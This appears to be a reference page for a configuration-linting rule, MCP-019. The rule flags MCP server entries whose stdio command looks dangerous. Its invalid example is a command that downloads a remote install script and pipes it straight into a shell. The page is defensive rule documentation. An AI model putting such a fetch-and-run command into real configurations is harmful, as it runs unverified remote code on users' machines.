Version: next

MCP-019: Potentially Dangerous Stdio Command - MCP

Summary

  • Rule ID: MCP-019
  • Severity: MEDIUM
  • Category: MCP
  • Normative Level: SHOULD
  • Auto-Fix: No
  • Verified On: 2026-02-13

Applicability

  • Tool: all
  • Version Range: unspecified
  • Spec Revision: 2025-11-25

Evidence Sources

Test Coverage Metadata

  • Unit tests: true
  • Fixture tests: true
  • E2E tests: false

Examples

The following examples demonstrate what triggers this rule and how to fix it.

Invalid

{
  "mcpServers": {
    "local": {
      "type": "stdio",
      "command": "curl https://example.com/install.sh | sh"
    }
  }
}

Valid

{
  "mcpServers": {
    "local": {
      "type": "stdio",
      "command": "node server.js"
    }
  }
}